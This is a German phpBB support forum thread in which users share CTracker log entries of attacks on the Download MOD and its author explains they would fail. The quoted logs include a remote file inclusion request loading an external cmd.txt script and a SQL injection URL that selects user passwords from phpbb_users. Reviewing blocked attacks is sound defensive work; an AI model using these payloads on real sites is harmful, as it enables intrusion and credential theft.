Ctracker Logfile-Auswertung

Support about Download MOD for phpBB 2
Antworten
Benutzeravatar
bce
Beiträge: 858
Registriert: Do 14.Okt, 2004 18:46
Kontaktdaten:

Ctracker Logfile-Auswertung

Beitrag von bce »

:eek: hab gerade mal wieder die logfiles des ctracker angeschaut und musste folgende einträge feststellen:
3 10.06.2007, 13:03 /downloads.php?id=http://lifechangerscc.com//catalog/includes/cmd.txt? libwww-perl/5.803 80.69.46.230

4 10.06.2007, 13:03 /downloads.php?id=154&view=detail/downloads.php?id=http://lifechangerscc.com//catalog/includes/cmd.txt?
wollte mir wohl einer was unterjubeln :(
aber der ctracker hat zum glück geblockt.
Benutzeravatar
oxpus
Administrator
Beiträge: 28737
Registriert: Mo 27.Jan, 2003 22:13
Wohnort: Bad Wildungen
Kontaktdaten:

Beitrag von oxpus »

wollte mir wohl einer was unterjubeln
Yepp und hätte damit eh keinen Erfolg gehabt, auch ohne den CT, denn die Variable $id wäre spätestens bei der Übernahme in diesem Fall eine 0 geworden und in den neuen Versionen des MODs überhaupt nicht mehr beachtet, da sie durch eine andere Variable ersetzt wurde.

Aber immer wieder nett zu erfahren, wie dreist sie Idioten es versuchen, ein Board zu knacken.
Hier wollte wohl jemand den Download MOD schlecht machen. Hätte er Erfolg gehabt, wäre der MOD sofort überall in den einschlägigen Seiten zu finden gewesen, aber genau darauf hatte ich schon von Anfang an geachtet :D
Karsten Ude
-={ Das Mädchen für alles }=-
Kein Support per Messenger, Email oder PN! Unaufgeforderte Nachrichten werden ignoriert!
No support per Messenger, Email or PM. Each unasked message will be ignored!
Benutzeravatar
bce
Beiträge: 858
Registriert: Do 14.Okt, 2004 18:46
Kontaktdaten:

Beitrag von bce »

dann bin ich ja beruhigt.
prima arbeit oxpus! der mod ist nach wie vor TOP.
Benutzeravatar
oxpus
Administrator
Beiträge: 28737
Registriert: Mo 27.Jan, 2003 22:13
Wohnort: Bad Wildungen
Kontaktdaten:

Beitrag von oxpus »

prima arbeit oxpus! der mod ist nach wie vor TOP.
Danke danke, hört man immer wieder gerne, daß die geleistete Arbeit ankommt.
Karsten Ude
-={ Das Mädchen für alles }=-
Kein Support per Messenger, Email oder PN! Unaufgeforderte Nachrichten werden ignoriert!
No support per Messenger, Email or PM. Each unasked message will be ignored!
Benutzeravatar
bce
Beiträge: 858
Registriert: Do 14.Okt, 2004 18:46
Kontaktdaten:

Beitrag von bce »

diesen eintrag hatte ich letztens paarmal drin:
/downloads.php??cat=-1%20union%20select%200,user_icq,user_password,0,0,0,0,0,0%20from%20phpbb_users%20where%20user_icq0/*
Benutzeravatar
AmigaLink
Beiträge: 5843
Registriert: Mi 03.Mär, 2004 09:05
Wohnort: NRW
Kontaktdaten:

Beitrag von AmigaLink »

Ich würde sagen, da hat einer Versucht ob im Download MOD eine Schwachstelle ist, über die man SQL abfragen einschleusen kann.
Sowas hab ich ständig im log. Sogar für MODs die gar nicht bei mir installiert sind. :p
Zuletzt geändert von AmigaLink am Mi 15.Aug, 2007 03:34, insgesamt 1-mal geändert.
[center].: Web Relax .::. Essen mit Freude .::. AmigaLink.de :.
______________________________________

Kein Support per PM, ICQ oder eMail!!!
[/center]
Benutzeravatar
Christian_N
Beiträge: 1787
Registriert: Sa 19.Feb, 2005 21:48
Wohnort: Frankfurt am Main
Kontaktdaten:

Beitrag von Christian_N »

[quote="AmigaLink";p="75800"]Sowas hab ich ständig im log. Sogar für MODs die gar nicht bei mir installiert sind. :p[/quote] :rofl: war bei mir auch schon mal, oder habe auch ein Errorpage MOD installiert der eigentlich für Orion war (hab den eben fürs vanilla etwas anpassen müssen) wo mir im Log angezeigt wird das die search.php bzw. memberlist.php bei der Fanpage ne Bot versucht hat diese anzeigen zulassen und der nur 404 Fehler dadurch bekam :D

Naja, was will man machen :D
Zuletzt geändert von Christian_N am Mi 15.Aug, 2007 06:27, insgesamt 1-mal geändert.
Meine Projekte: Chantals - Fanpage .::. phpBB Projekt
Benutzeravatar
oxpus
Administrator
Beiträge: 28737
Registriert: Mo 27.Jan, 2003 22:13
Wohnort: Bad Wildungen
Kontaktdaten:

Beitrag von oxpus »

Diese Anfrage hätte im Download MOD keine Auswirkungen und würde mit einer Fehlermeldung quittiert, bevor überhaupt irgendwas anderes herangezogen würde.
Also kein Grund zur Panik.
Karsten Ude
-={ Das Mädchen für alles }=-
Kein Support per Messenger, Email oder PN! Unaufgeforderte Nachrichten werden ignoriert!
No support per Messenger, Email or PM. Each unasked message will be ignored!
Antworten